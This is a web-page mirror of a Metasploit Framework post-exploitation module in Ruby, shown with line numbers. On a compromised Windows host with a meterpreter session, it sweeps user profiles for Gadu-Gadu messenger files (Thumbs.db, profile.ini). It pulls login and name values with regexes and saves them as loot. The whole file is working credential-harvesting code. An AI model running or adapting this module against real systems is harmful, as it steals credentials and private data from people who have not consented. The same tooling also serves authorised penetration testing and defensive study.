Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/gadugadu.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::File
8
include Msf::Post::Windows::UserProfiles
9
include Msf::Post::Windows::Packrat
10
ARTIFACTS =
11
{
12
application: 'gadugadu',
13
app_category: 'chats',
14
gatherable_artifacts: [
15
{
16
filetypes: 'chat_logs',
17
path: 'GG dysk',
18
dir: 'Galeria',
19
artifact_file_name: 'Thumbs.db',
20
description: 'Saved GaduGadu User Profile Images in Thumbs.db file',
21
credential_type: 'image'
22
},
23
{
24
filetypes: 'chat_logs',
25
path: 'AppData',
26
dir: 'GG',
27
artifact_file_name: 'profile.ini',
28
description: 'GaduGadu profile User information : Rename long saved artifactto in profile.ini',
29
credential_type: 'text',
30
regex_search: [
31
{
32
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
33
extraction_type: 'credentials',
34
regex: [
35
'(?i-mx:name=.*)',
36
'(?i-mx:login=.*)',
37
'(?i-mx:path=.*)'
38
]
39
}
40
]
41
}
42
]
43
}.freeze
44
45
def initialize(info = {})
46
super(
47
update_info(
48
info,
49
'Name' => 'Gadugadu Credential Gatherer',
50
'Description' => %q{
51
This module searches for Gadugadu credentials on a Windows host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.
52
},
53
'License' => MSF_LICENSE,
54
'Author' => [
55
'Kazuyoshi Maruta',
56
'Daniel Hallsworth',
57
'Barwar Salim M',
58
'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
59
],
60
'Platform' => ['win'],
61
'SessionTypes' => ['meterpreter'],
62
'Notes' => {
63
'Stability' => [CRASH_SAFE],
64
'Reliability' => [],
65
'SideEffects' => []
66
}
67
)
68
)
69
70
register_options(
71
[
72
OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
73
OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
74
OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
75
# enumerates the options based on the artifacts that are defined below
76
OptEnum.new('ARTIFACTS', [
77
false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
78
k[:filetypes]
79
end.uniq.unshift('All')
80
])
81
]
82
)
83
end
84
85
def run
86
print_status('Filtering based on these selections: ')
87
print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
88
print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
89
print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
90
91
# used to grab files for each user on the remote host
92
grab_user_profiles.each do |userprofile|
93
run_packrat(userprofile, ARTIFACTS)
94
end
95
96
print_status 'PackRat credential sweep completed'
97
end
98
end
99
100